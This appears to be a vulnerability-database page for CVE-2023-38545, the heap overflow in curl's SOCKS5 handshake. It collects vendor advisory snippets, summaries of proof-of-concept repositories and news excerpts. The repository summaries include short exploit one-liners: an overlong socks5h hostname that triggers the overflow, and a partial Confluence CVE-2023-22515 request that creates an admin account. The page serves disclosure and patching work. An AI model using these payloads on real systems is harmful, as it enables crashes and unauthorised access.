CVE-2023-38545

Published: 18/10/2023 Updated: 01/04/2024
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 0

Vulnerability Summary

A heap-based buffer overflow has been found in the SOCKS5 proxy handshake component of cURL prior to 8.4.0.

Vulnerable Product

haxx libcurl

fedoraproject fedora 37

netapp oncommand workflow automation -

netapp oncommand insight -

netapp active iq unified manager -

microsoft windows 10 22h2

microsoft windows 11 21h2

microsoft windows 11 22h2

microsoft windows 11 23h2

microsoft windows 10 1809

microsoft windows server 2019

microsoft windows server 2022

microsoft windows 10 21h2

Vendor Advisories

Two security issues were found in Curl, an easy-to-use client-side URL transfer library and command line tool: CVE-2023-38545: Jay Satiro discovered a buffer overflow in the SOCKS5 proxy handshake. CVE-2023-38546: It was discovered that under some circumstances libcurl was susceptible to cookie injection. For the oldstable distribution ...
An issue was found in curl that can cause a buffer overflow in its SOCKS5 proxy communications code. When curl is using a SOCKS5 proxy and it needs to resolve a hostname to an IP address, its default behavior is to pass the hostname to the proxy and allow it to perform the resolution. In cases where the hostname is greater than 255 characters in le ...
Synopsis Important: OpenShift Virtualization 4136 security and bug fix update Type/Severity Security Advisory: Important Topic Red Hat OpenShift Virtualization release 4136 is now available with updates to packages and images that fix several bugs and add enhancements. Red Hat Product Security has rated this update as having a security i ...
Synopsis Important: OpenShift Virtualization 4141 security and bug fix update Type/Severity Security Advisory: Important Topic Red Hat OpenShift Virtualization release 4141 is now available with updates to packages and images that fix several bugs and add enhancementsRed Hat Product Security has rated this update as having a security imp ...
Synopsis Important: Red Hat JBoss Core Services Apache HTTP Server 2457 SP2 security update Type/Severity Security Advisory: Important Topic Red Hat JBoss Core Services Apache HTTP Server 2457 Service Pack 2 is now available. Red Hat Product Security has rated this update as having a security impact of Important A Common Vulnerability S ...
Synopsis Important: Red Hat Ceph Storage 61 security, enhancements, and bug fix update Type/Severity Security Advisory: Important Topic Updated container image for Red Hat Ceph Storage 61 is now available in the Red Hat Ecosystem Catalog Description Red Hat Ceph Storage is a scalable, open, software-defined storage platform that combines ...
Synopsis Important: curl security update Type/Severity Security Advisory: Important Red Hat Insights patch analysis Identify and remediate systems affected by this advisory View affected systems Topic An update for curl is now available for Red Hat Enterprise Linux 90 Extended Update SupportRed Hat Product Security has rated this ...
Synopsis Important: curl security update Type/Severity Security Advisory: Important Red Hat Insights patch analysis Identify and remediate systems affected by this advisory View affected systems Topic An update for curl is now available for Red Hat Enterprise Linux 92 Extended Update SupportRed Hat Product Security has rated this ...
Synopsis Important: Red Hat JBoss Core Services Apache HTTP Server 2457 SP2 security update Type/Severity Security Advisory: Important Red Hat Insights patch analysis Identify and remediate systems affected by this advisory. View affected systems Topic An update is now available for Red Hat JBoss Core Services. Red Hat Product Security has ...
Synopsis Important: Migration Toolkit for Applications security and bug fix update Type/Severity Security Advisory: Important Topic Migration Toolkit for Applications 621 releaseRed Hat Product Security has rated this update as having a security impact of Important A Common Vulnerability Scoring System (CVSS) base score, which gives a deta ...
Synopsis Important: Network Observability security update Type/Severity Security Advisory: Important Topic An update for network-observability-console-plugin-container, network-observability-ebpf-agent-container, network-observability-flowlogs-pipeline-container, network-observability-operator-bundle-container, and network-observability-opera ...
Synopsis Important: Red Hat OpenStack Platform 1711 (director-operator) security update Type/Severity Security Advisory: Important Topic An update for osp-director-agent-container, osp-director-downloader-container, osp-director-operator-bundle-container, and osp-director-operator-container is now available for Red Hat OpenStack Platform 17 ...
Synopsis Low: Logging Subsystem 581- Red Hat OpenShift security update Type/Severity Security Advisory: Low Topic An update is now available for RHOL-58-RHEL-9Red Hat Product Security has rated this update as having a security impact of Low A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, i ...
Synopsis Important: OpenShift Virtualization 4135 Images security update Type/Severity Security Advisory: Important Topic Red Hat OpenShift Virtualization release 4135 is now available with updates to packages and images that fix several bugs and add enhancementsRed Hat Product Security has rated this update as having a security impact o ...
Synopsis Important: cert-manager Operator for Red Hat OpenShift 1115 Type/Severity Security Advisory: Important Topic cert-manager Operator for Red Hat OpenShift 1115Red Hat Product Security has rated this update as having a security impact of Important A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed sever ...
Synopsis Important: cert-manager Operator for Red Hat OpenShift 1121 Type/Severity Security Advisory: Important Topic cert-manager Operator for Red Hat OpenShift 1121Red Hat Product Security has rated this update as having a security impact of Important A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed sever ...
Synopsis Important: curl security update Type/Severity Security Advisory: Important Red Hat Insights patch analysis Identify and remediate systems affected by this advisory View affected systems Topic An update for curl is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has r ...
Synopsis Important: Kernel Module Management security update Type/Severity Security Advisory: Important Topic This is an update for the Red Hat OpenShift Kernel Module Management 11 operator and images to address CVE-2023-44487 which Red Hat has assessed as being Important (sees accessredhatcom/security/cve/CVE-2023-44487 for detai ...
On October 11, 2023, cURL released Version 8.4.0 of the cURL utility and the libcurl library. This release addressed two security vulnerabilities: CVE-2023-38545 - High Security Impact Rating (SIR); CVE-2023-38546 - Low SIR. This advisory covers CVE-2023-38545 only. For more information about this vulnerability, see the cURL advisory. This adviso ...
A heap-based buffer overflow has been found in the SOCKS5 proxy handshake component of cURL before 8.4.0 ...
LTS-114 has been updated in the LTS channel to 11405735339 (Platform Version: 15437760) for most ChromeOS devices Want to know more about Long Term Support? Click hereThis update contains multiple Security fixes, including:1491296 High  CVE-2023-5472 Use after free in Profiles1458934 Medium CVE-20 ...
A vulnerability (VTS23-013) exists in JP1/VERITAS Affected products and versions are listed below ...
Check Point Reference: CPAI-2023-0916 Date Published: 12 Oct 2023 Severity: Critical ...
About Apple security updates For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available Recent releases are listed on the Apple security releases page Apple security documents reference vulnerabilities by CVE-ID whe ...

Github Repositories

A proof of concept for testing CVE-2023-38545 against local curl

CVE-2023-38545: Curl Vulnerability Proof of Concept This repository contains a Proof of Concept (PoC) designed to test systems for the CVE-2023-38545 vulnerability The vulnerability affects the curl utility, specifically versions between 7690 and 831, and is related to the handling of HTTP redirects Prerequisites Required Software: curl Features SOCKS5 Proxy Server runni

One line vulnerabilities

vuln-liners One line vulnerabilities CVE-2023-38545 curl -vvv -x socks5h://localhost:9050 $(python3 -c "print(('A'*10000), end='')") CVE-2023-22515 (Confluence Broken Access Control) curl -k -X POST -H "X-Atlassian-Token: no-check" --data-raw "username=adm1n&fullName=admin&email=admin@confluence&password=adm1n

Dockerfile containing all the necessary setup files to demo the exploit

Quick description This showcases the cURL CVE-2023-38545 It is as lightweight as I could make it Setup First, build the Docker Image: docker build -t cveimage Next, we can simply run the image file, creating a temporary Docker Container which will get deleted once the container is stopped: docker run --rm --tty --net="host" --name cvecontainer cveimage If you are

Simple PoC causing overflow

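Disclaimer: This article is for technical discussion and learning only. The user alone is responsible for any direct or indirect consequences and losses caused by using the information provided in this article; the author assumes no responsibility for them. CVE-2023-38545: libcurl-SOCKS5-heap-buffer-overflow Reference project: githubcom/UTsweetyfish/CVE-2023-38545, reproduced here. Reproduction steps: run the following commands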

CVE-2023-38545 POC for the curl command line tool

CVE-2023-38545 POC for the curl command line tool This POC is based on the earlier POC created by UTsweetyfish, shared in this repository: githubcom/UTsweetyfish/CVE-2023-38545 Contrary to that POC, this one is for the commandline tool and not the libcurl library, and doesn't require Python and no compilation This POC is for the curl SOCKS5 heap buffer overflow,

ipmi-server docker container with Symfony router

IPMI Docker Container for Home Assistant Details of the container IPMI Server This container is a lightweight fully-fledged webserver that allows us to execute ipmitool commands and returns a json object with some results, courtesy of @ateodorescu and their Home Assistant Add-on, ipmi-server and uses their Symphony app and nginx configuration The image itself is based on

Vulnerability-Management-remediation-with-Talon- Create EKS Cluster with Cilium CNI Access Falco sidekick UI Option 1: portforwarding kubectl port-forward svc/falco-falcosidekick-ui -n falco 2802 --insecure-skip-tls-verify Option 2: creating node port apiVersion: v1 kind: Service metadata: name: falco-falcosidekick-ui-nodeport namespac

😄 POC and analysis article for the CVE-2023-38545 heap overflow

usage git clone githubcom/imfht/CVE-2023-38545 cd CVE-2023-38545/curl-7740 && /configure --with-openssl make -j 4 python3 sockspy & export ALL_PROXY=socks5h://127001:9050 /curl-7740/src/curl $(python3 -c "print(('A'*10000), end='')") -vvvv proof for details please

Recent Articles

curl vulnerabilities ironed out with patches after week-long tease
The Register

The coordinated disclosure didn’t quite go to plan, though

After a week of rampant speculation about the nature of the security issues in curl, the latest version of the command line transfer tool was finally released today. Described by curl project founder and lead developer Daniel Stenberg as "probably the worst curl security flaw in a long time," the patches address two separate vulnerabilities: CVE-2023-38545 and CVE-2023-38546. We now know the first vulnerability, CVE-2023-38545, is a heap-based buffer overflow flaw that affects both libcurl and t...

Fresh curl tomorrow will patch 'worst' security flaw in ages
The Register

It’s bad, folks. Pair of CVEs incoming on October 11

Start your patch engines – a new version of curl is due tomorrow that addresses a pair of flaws, one of which lead developer Daniel Stenberg describes as "probably the worst curl security flaw in a long time." Curl 8.4.0 will hit at around 0600 UTC (0800 CEST, 0700 BST, 0200 EST, 2300 PDT) on October 11 and deal with CVE-2023-38545, which affects both libcurl and the curl tool, and CVE-2023-38546, which only affects libcurl. The release has no API or ABI changes, so the update should slot in w...